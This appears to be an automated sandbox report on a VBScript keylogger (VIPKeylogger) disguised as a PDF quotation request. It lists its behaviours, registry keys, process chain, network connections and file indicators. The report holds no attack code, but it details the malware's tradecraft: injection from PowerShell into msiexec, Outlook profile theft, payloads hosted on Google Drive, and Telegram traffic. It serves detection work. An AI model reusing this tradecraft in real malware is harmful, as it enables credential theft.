Analysis Overview
SHA256
14eb913e7c5fe08f6c5f656178f35713b605f7d0aa1c62489b3cfaf418a0c27e
Threat Level: Known bad
The file Request For Quotation-RFQ097524_Pdf.vbs was found to be: Known bad.
Malicious Activity Summary
Vipkeylogger family
VIPKeylogger
Blocklisted process makes network request
Checks computer location settings
Looks up external IP address via web service
Accesses Microsoft Outlook profiles
Legitimate hosting services abused for malware hosting/C2
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of NtCreateThreadExHideFromDebugger
System Location Discovery: System Language Discovery
Browser Information Discovery
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
outlook_win_path
Suspicious behavior: MapViewOfSection
Suspicious use of WriteProcessMemory
outlook_office_path
Analysis: static1
Detonation Overview
Reported
2024-10-30 06:23
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-30 06:23
Reported
2024-10-30 06:25
Platform
win10v2004-20241007-en
Max time kernel
148s
Max time network
158s
Signatures
VIPKeylogger
Vipkeylogger family
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.dyndns.org | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2508 wrote to memory of 2412 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2508 wrote to memory of 2412 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1840 wrote to memory of 1168 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 1840 wrote to memory of 1168 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 1840 wrote to memory of 1168 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 1840 wrote to memory of 1168 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe |
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Request For Quotation-RFQ097524_Pdf.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 142.250.179.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| US | 8.8.8.8:53 | 238.179.250.142.in-addr.arpa | udp |
| GB | 142.250.187.193:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.190.18.2.in-addr.arpa | udp |
| GB | 142.250.179.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.180.3:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 142.250.180.3:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | 3.180.250.142.in-addr.arpa | udp |
| GB | 142.250.187.193:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| BR | 132.226.247.73:80 | checkip.dyndns.org | tcp |
| US | 8.8.8.8:53 | reallyfreegeoip.org | udp |
| US | 104.21.67.152:443 | reallyfreegeoip.org | tcp |
| US | 8.8.8.8:53 | 73.247.226.132.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.67.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | 25.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r5c13izr.0o4.ps1
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
C:\Users\Admin\AppData\Roaming\Bortelimeneres.Uds
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-30 06:23
Reported
2024-10-30 06:25
Platform
win7-20240903-en
Max time kernel
150s
Max time network
122s
Signatures
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2040 wrote to memory of 2588 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2040 wrote to memory of 2588 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2040 wrote to memory of 2588 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Request For Quotation-RFQ097524_Pdf.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Network
Files